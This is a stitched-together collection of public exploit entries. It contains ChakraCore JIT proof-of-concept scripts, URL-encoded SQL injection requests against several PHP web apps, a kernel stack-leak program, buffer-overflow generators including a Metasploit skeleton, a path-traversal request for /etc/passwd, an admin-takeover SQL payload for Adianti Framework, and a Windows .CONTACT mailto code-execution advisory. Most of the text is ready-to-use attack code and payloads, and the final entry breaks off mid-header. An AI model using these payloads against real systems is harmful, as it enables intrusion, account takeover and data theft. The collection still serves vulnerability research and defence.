/*
The JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode method is used to execute JsBuiltIn.js, which initializes some builtin objects. Because it is essentially written in JavaScript, it needs to clear the disable-implicit-call flag before calling the JavaScript code, otherwise it might not work properly. The problem is that it doesn't restore the previous state of the flag after the call. As setting the flag can prevent stack-allocated objects from leaking, this clearing-the-flag bug can lead to a stack-based use-after-free.
To exploit this bug, one needs to build a chain that first clears the flag by calling the vulnerable method and then leaks the stack-allocated object. This is done with the Error.prototype.toString method (marked as having no side effects), which calls the "toString" method on the "name" property and then on the "message" property of the "this" object. So when it accesses the "name" property, it clears the flag, and when it accesses the "message" property, it leaks the "this" object.
PoC:
*/
function opt() {
  // Per the write-up above: once opt() is JIT-compiled, `o` never escapes the
  // function, so the JIT may place it on the stack. The `o.x` read is meant to
  // execute with the disable-implicit-call flag set; main() installs a getter
  // for `x` on Object.prototype, so this read is what dispatches into
  // Error.prototype.toString with `this === o`.
  let o = {}; // stack-allocated object
  o.x; // read executed with DisableImplicitFlags set
}
function main() {
  // Warm-up: presumably enough calls for the JIT to compile opt() and
  // stack-allocate its `o`; the count is the author's choice, not verified.
  for (let i = 0; i < 10000; i++) {
    opt();
  }
  let leaked_stack_object = null;
  let object_prototype = ({}).__proto__; // Object.prototype
  // Chain (see the write-up above): `o.x` inside opt() now invokes
  // Error.prototype.toString with `this === o`. That built-in reads `name`
  // first and `message` second, which orders the two hooks below.
  object_prototype.__defineGetter__('x', Error.prototype.toString);
  object_prototype.__defineGetter__('message', function () {
    delete object_prototype.message; // one-shot: remove this getter on first use
    leaked_stack_object = this; // retain a reference to opt()'s stack-allocated `o`
  });
  // Step 1 of the chain: reading `name` resolves Array.prototype, which runs
  // the builtin-library injection that clears the flag.
  object_prototype.name = Array.prototype; // access to Array.prototype will call JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode.
  opt();
  // alert() implies a browser host. The captured object outlives opt()'s
  // frame, so whatever alert() reads from it is the use-after-free.
  alert(leaked_stack_object);
}
main(); // entry point: runs the PoC described in the comment block above
/*
Issue description
This is similar to issue 1702 (https://www.exploit-db.com/exploits/46203). This time, it uses an InitClass instruction to reach the SetIsPrototype method.
PoC:
*/
function opt(o, c, value) {
  o.b = 1;
  // `class A extends c` emits an InitClass instruction which, per the write-up
  // and issue 1702, reaches SetIsPrototype on c.prototype's type handler. In
  // main()'s trigger call, c.prototype *is* `o`, so this statement can
  // transition o's type while the JIT still assumes the layout it inferred
  // from `o.b = 1` above. The class body is intentionally empty; A is unused.
  class A extends c {
  }
  // Store made with the JIT's now-stale assumption about o's slot layout.
  o.a = value;
}
function main() {
  // Training: 2000 calls with a fresh `o` and an unrelated constructor, so
  // the JIT compiles opt() assuming the class definition never touches `o`
  // (the iteration count is the author's choice, not verified here).
  for (let i = 0; i < 2000; i++) {
    let o = {a: 1, b: 2};
    opt(o, (function () {}), {});
  }
  let o = {a: 1, b: 2};
  let cons = function () {};
  cons.prototype = o; // make `o` the prototype that `class A extends cons` marks
  // 0x1234 is a marker value chosen by the author; print() is the host shell's
  // output builtin (not a browser API) and shows what actually landed in o.a.
  opt(o, cons, 0x1234);
  print(o.a);
}
main(); // entry point: runs the InitClass PoC above
The NewScObjectNoCtor and InitProto opcodes are treated as having no side effects, but they can actually have side effects via the SetIsPrototype method of the type handler, which can cause a transition to a new type. This can lead to type confusion in the JITed code.
In the PoC, it overwrites the pointer to property slots with 0x1000000001234.
PoC for NewScObjectNoCtor:
// Empty constructor. main() reassigns cons.prototype before each opt() call,
// so `new cons()` inside opt() is what reaches the prototype's type handler.
function cons() {
}
function opt(o, value) {
  o.b = 1;
  // NewScObjectNoCtor: `new cons()` is treated as side-effect free by the JIT,
  // but per the write-up SetIsPrototype on cons.prototype can transition its
  // type. In the trigger call cons.prototype === o. The result is discarded
  // on purpose; only the side effect matters.
  new cons();
  o.a = value; // store made with the JIT's stale assumption about o's layout
}
function main() {
  // Training: each iteration gives cons a fresh, unrelated prototype and a
  // fresh `o`, so the JIT compiles opt() assuming `new cons()` leaves `o` alone.
  for (let i = 0; i < 2000; i++) {
    cons.prototype = {};
    let o = {a: 1, b: 2};
    opt(o, {});
  }
  let o = {a: 1, b: 2};
  cons.prototype = o; // trigger: `new cons()` inside opt() now marks `o` itself as a prototype
  opt(o, 0x1234);
  // Host-shell print(). The write-up above says the property-slots pointer
  // ends up as 0x1000000001234 in this PoC.
  print(o.a);
}
main(); // entry point: runs the NewScObjectNoCtor PoC above
PoC for InitProto:
function opt(o, proto, value) {
  o.b = 1;
  // InitProto: the literal's __proto__ initializer makes `proto` a prototype
  // (SetIsPrototype on its type handler, per the write-up). `tmp` is
  // deliberately unused — the literal exists only for that side effect.
  let tmp = {__proto__: proto};
  o.a = value; // store made with the JIT's now-stale layout assumption for `o`
}
function main() {
  // Training: unrelated `proto` objects, so opt() is compiled assuming the
  // object literal never affects `o`.
  for (let i = 0; i < 2000; i++) {
    let o = {a: 1, b: 2};
    opt(o, {}, {});
  }
  let o = {a: 1, b: 2};
  opt(o, o, 0x1234); // trigger: `o` is passed as its own `proto` argument
  print(o.a); // host-shell print(): shows what landed in o.a
}
main(); // entry point: runs the InitProto PoC above
# Exploit Title: Coman - Company Management System 1.0 - SQL Injection
# Dork: N/A
# Date: 2019-01-20
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://ragob.com/
# Software Link: https://codecanyon.net/item/coman-company-management-system/17799270
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php/framework-crud-detailaction?crud=task&id=[SQL]&backTo=dashboard
#
GET /[PATH]/index.php/framework-crud-detailaction?crud=task&id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29+%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&backTo=dashboard HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dc
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sun, 20 Jan 2019 12:59:10 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/7.0.28
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
#define _GNU_SOURCE
#define _BSD_SOURCE
#include <sys/timex.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/syscall.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <kptr-lib.h>
// Ubuntu 4.13.0-16-generic
// gcc -o poc poc.c -m32
/* Global adjtimex(2) request/response buffer, zeroed in main() before use.
 * NOTE(review): the name shadows libc's time(3) wherever <time.h> ends up
 * included; it evidently built with the toolchain named above, but rename if
 * porting. */
struct timex time;
int main(int argc, char **argv)
{
    int r; /* unused */
    unsigned long long stack_offset, kernel_base;
    unsigned int leak_value;
    unsigned int high = 0xffffffff;
    /* memset()/memcpy() are used without <string.h> (absent from the include
     * list above); older gcc only warns about the implicit declaration, gcc 14
     * rejects it outright. */
    memset(&time, 0, sizeof(time));
    time.modes = 0x8000; /* raw mode bits chosen by the author; not a documented ADJ_* name here */
    /* prot 3 = PROT_READ|PROT_WRITE; 2022 is a raw flags word left undecoded.
     * Return value is ignored. */
    mmap(0,0xa000,3,2022,-1,0);
    adjtimex(&time); /* return value unchecked */
    /* The variable names indicate the author expects `tai` to come back holding
     * kernel-stack data (the leak this PoC demonstrates) on the 32-bit build
     * (-m32, see header comment); not verified here. */
    leak_value = time.tai;
    printf("--> leak_value : %x\n", leak_value);
    /* Dead code: both memcpy() results are discarded by the full reassignment
     * of kernel_base two lines below. */
    memcpy(&kernel_base, &leak_value, 4);
    memcpy((char *)&kernel_base + 4, &high, 4);
    stack_offset = 0x1fc4a4; /* build-specific constant (Ubuntu 4.13.0-16-generic per header comment) */
    kernel_base = leak_value - stack_offset;
    printf("--> kernel_stack_base : %llx\n", kernel_base);
    return 0;
}
# Exploit Title: Reservic - Reserves Management System 1.0 - SQL Injection
# Dork: N/A
# Date: 2019-01-20
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://ragob.com/
# Software Link: https://codecanyon.net/item/reservic-reserves-management-system/11736786
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php/framework-crud-detailaction?crud=reserves&id=[SQL]&backTo=dashboard
#
GET /[PATH]/index.php/framework-crud-detailaction?crud=reserves&id=4+%41%4e%44%28%53%45%4c%45%43%54%20%31+%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29+%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&backTo=dashboard HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dc
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sun, 20 Jan 2019 13:01:16 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/7.0.28
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
# Exploit Title: PHP Dashboards NEW 5.8 - SQL Injection
# Dork: N/A
# Date: 2019-01-21
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://dataninja.biz
# Software Link: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104
# Version: 5.8
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/php/save/savedescriptions.php?dashID=[SQL]
#
GET /[PATH]/php/save/savedescriptions.php?dashID=%2d%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%73%63%68%65%6d%61%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%53%43%48%45%4d%41%54%41%29%2c%31%31%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 20 Jan 2019 21:08:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Host-Header: 192fc2e7e50945beb8231a492d6a8024
X-Proxy-Cache: MISS
# Exploit Title: MoneyFlux - Cashflow Management System 1.0 - SQL Injection
# Dork: N/A
# Date: 2019-01-20
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://ragob.com/
# Software Link: https://codecanyon.net/item/moneyflux-laravel-5-cashflow-system/21577611
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php/framework-crud-updateaction?id=[SQL]&crud=expense
#
GET /[PATH]/index.php/framework-crud-updateaction?id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31+%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20AS+%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&crud=expense HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dc
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sun, 20 Jan 2019 12:39:58 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/7.0.28
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
#!/usr/bin/python
# Exploit Title: Echo Mirage 3.1 Buffer Overflow PoC (Stack Overflow)
# Date: 21-01-2019
# Software Link: https://sourceforge.net/projects/echomirage.oldbutgold.p/
# Version: 3.1 (x64)
# Exploit Author: InitD Community
# Contact: https://twitter.com/initd_sh
# Website: http://initd.sh/
# Tested on: Windows 7
"""
Step to Reproduce : Open Echo Mirage --> 1) Click on "Rules" --> 2) click on "New" --> 3)Copy "Echo-Mirage-BoF-POC.txt" content and Paste in "action" field. --> BOoo0m.
Thanks: Touhid M.Shaikh(@touhidshaikh22), Shrutirupa(@creak_crypt)
This Bug Identified by Touhid M.Shaikh
"""
buffer = "A"*24241
RBP = "B"*8
PAD = "C"*50
evil = buffer + RBP + PAD
evil_file = open("Echo-Mirage-BoF-POC.txt","w")
evil_file.write(evil)
evil_file.close()
# Exploit Title: stack-based overflow
# Date: 2019-11-21
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: http://labapart.com/
# Software Link: https://github.com/labapart/gattlib/issues/81
# Version: 0.2
# Tested on: Linux 4.15.0-38-generic
# CVE: CVE-2019-6498
# References:
# https://github.com/labapart/gattlib/issues/81
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6498
## Summary:
While fuzzing gattlib (a library to access GATT information from BLE
(Bluetooth Low Energy) devices) using clang 6.0 with ASAN, a stack-based
buffer overflow was observed.
## Vulnerable code from gattlib.c
// Transform string from 'DA:94:40:95:E0:87' to 'dev_DA_94_40_95_E0_87'
// NOTE(review): strncpy() does not NUL-terminate when `dst` is at least
// sizeof(device_address_str) bytes long, so the strlen() in the loop condition
// can read past the end of the buffer and the '_' store can then write past
// it (the declaration of device_address_str is not shown in this excerpt).
// strlen() is also re-evaluated on every iteration.
strncpy(device_address_str, dst, sizeof(device_address_str));
for (i = 0; i < strlen(device_address_str); i++) {
    if (device_address_str[i] == ':') {
        device_address_str[i] = '_';
    }
}
## Vulnerable code from discover.c
// Fragment of discover.c's main() (the enclosing function is not shown).
if (argc != 2) {
    printf("%s <device_address>\n", argv[0]);
    return 1;
}
// argv[1] is handed to gattlib_connect() with no length or format check;
// presumably it is what the strncpy()/strlen() code above eventually copies.
connection = gattlib_connect(NULL, argv[1], BDADDR_LE_PUBLIC, BT_SEC_LOW,
0, 0);
if (connection == NULL) {
    fprintf(stderr, "Fail to connect to the bluetooth device.\n");
    return 1;
}
## PoC
# Triggers the overflow from the CLI: argv[1] is 20 'A's, longer than a
# well-formed "XX:XX:XX:XX:XX:XX" address (17 bytes).
./discover `python -c 'print "A"*20'`
## MSF code
# Metasploit exploit entry point. NOTE(review): this appears to be a generic
# TCP template — it uses connect/sock.put and packs a 32-bit return address —
# which does not match the local CLI PoC above (./discover with an argv
# string); `target.ret` is not defined anywhere on this page. Treat it as a
# skeleton, not a working module.
def exploit
  connect # presumably the Tcp mixin's connect (mixin not shown here)
  print_status("Sending #{payload.encoded.length} byte payload...")
  # Building the buffer for transmission
  buf = "A" * 20 # same 20-byte filler as the CLI PoC
  buf += [ target.ret ].pack('V') # 32-bit little-endian value from the target definition
  buf += payload.encoded
  sock.put(buf)
  sock.get
  handler
end
# Exploit Title: PHP Dashboards NEW 5.8 - Local File Inclusion
# Dork: N/A
# Date: 2019-01-21
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://dataninja.biz
# Software Link: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104
# Version: 5.8
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/php/file/read.php
#
POST /[PATH]/php/file/read.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
filename=../../../../../../etc/passwd: undefined
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 20 Jan 2019 20:56:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Host-Header: 192fc2e7e50945beb8231a492d6a8024
# Exploit Title: PHP Uber-style GeoTracking 1.1 - SQL Injection
# Dork: N/A
# Date: 2019-01-21
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://dataninja.biz
# Software Link: https://codecanyon.net/item/php-uberstyle-geotracking/20320021
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/php/profile/index.php
#
POST /[PATH]/php/profile/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 354
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
email=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2d%2d%20%2d: undefined
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 20 Jan 2019 21:47:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Host-Header: 192fc2e7e50945beb8231a492d6a8024
# POC:
# 2)
# http://localhost/[PATH]/php/profile/index.php
#
POST /[PATH]/php/profile/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 355
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
mapkey=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2d%2d%20%2d: undefined
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 20 Jan 2019 21:46:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Host-Header: 192fc2e7e50945beb8231a492d6a8024
# POC:
# 3)
# http://localhost/[PATH]/php/photos/index.php
#
POST /[PATH]/php/photos/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
email=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2d%2d%20%2d: undefined
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 20 Jan 2019 21:49:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Host-Header: 192fc2e7e50945beb8231a492d6a8024
# Exploit Title: [SQL Injection in Adianti Framework]
# Date: [2018-12-18]
# Exploit Author: [Joner de Mello Assolin]
# Vendor Homepage: [https://www.adianti.com.br]
# Version: [5.5.0 and 5.6.0] (REQUIRED)
# Tested on: [XAMPP Version 7.2.2, phpMyAdmin 4.7.7 and 4.8.4, PHP 7.1 , Apache/2.4.29 (Win32) , libmysql - mysqlnd 5.0.12-dev – 20150407 and MariaDB 10.1]
# Software Link: [https://www.adianti.com.br/download-center?app=template]
The flaw allows any ordinary user to perform SQL injection and take over the administrator account, or any other user's account,
by editing their own profile.
POC:
1- Register an ordinary user, or use the framework's default account (user=user, password=user)
2- Access the user profile and click edit http://localhost/template/index.php?class=SystemProfileForm&method=onEdit
3- In the Name field, enter the following SQL injection and click Save:
(SELECT 'hackeado'),login=(SELECT 'anonymous'),password=(SELECT '294de3557d9d00b3d2d8a1e6aab028cf'),email=(SELECT 'anonymous@anonymous.com')WHERE `id`=1#
4- Go to the login screen and enter the username and password below; you can now log in as administrator.
USER: anonymous
PASSWORD: anonymous
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program
[+] ZDI-CAN-7591
[Vendor]
www.microsoft.com
[Product]
Microsoft .CONTACT File
A file with the CONTACT file extension is a Windows Contact file. They're used in Windows 10, Windows 8, Windows 7, and Windows Vista.
This is the folder where CONTACT files are stored by default: C:\Users\[USERNAME]\Contacts\.
[Vulnerability Type]
Mailto: HTML Link Injection Remote Code Execution
[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The flaw is due to the processing of ".contact" files: the E-mail address field expects an E-mail address value, but the .CONTACT file is
vulnerable to HTML injection because no validation is performed. Therefore, if an attacker references an executable file using an HREF tag, it will run
instead of performing the expected email behavior, without any warning. This is dangerous and would be unexpected to an end user.
The E-mail address's Mailto: link will then point to an arbitrary executable, like:
<a href="calc.exe">pwn@microsoft.com</a>
Additionally the executable file can live in a sub-directory and be referenced like "<a href="mydir\malicious.exe">pwn@microsoft.com</a>" or attackers can use
directory traversal techniques to point to a malware say sitting in the targets Downloads directory like:
<a href="..\..\..\..\Users\victim\Downloads\evil.exe">pwn@microsoft.com</a>
Making matters worse, if the files are compressed and then downloaded, the "mark of the web" (MOTW) may not work as expected with certain archive utilities.
This advisory was initially one of three different vulnerabilities I reported to the Zero Day Initiative Program (ZDI), which Microsoft decided not to release a security fix
for and closed. The first cases I reported to ZDI concerned the Website address input fields of .VCF and .CONTACT files.
This example is yet another vector affecting Windows .CONTACT files and is being released as the .CONTACT file issue is now publicly known.
[Exploit/POC]
Create a Windows .CONTACT file and inject the following HTML into the E-mail: field
<a href="calc.exe">pwn@microsoft.com</a>
Windows will prompt you like "The e-mail address you have entered is not a valid internet e-mail address. Do you still want to add this address?"
Click Yes.
Open the .CONTACT file and click the Mailto: link BOOM! Windows calculator will execute.
Attacker supplied code is not limited to .EXE, .CPL or .COM as .VBS files will also execute! :)
[POC Video URL]
https://vimeo.com/312824315
[Disclosure Timeline]
Reported to ZDI 2018-11-22 (ZDI-CAN-7591)
Another separate vulnerability affecting MS Windows .contact files affected the Website address input fields and was publicly disclosed January 16, 2019.
https://www.zerodayinitiative.com/advisories/ZDI-19-121/
Public disclosure : January 22, 2019
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
# Exploit Title: Joomla! Component Easy Shop 1.2.3 - Local File Inclusion
# Dork: N/A
# Date: 2019-01-22
# Exploit Author: Ihsan Sencan
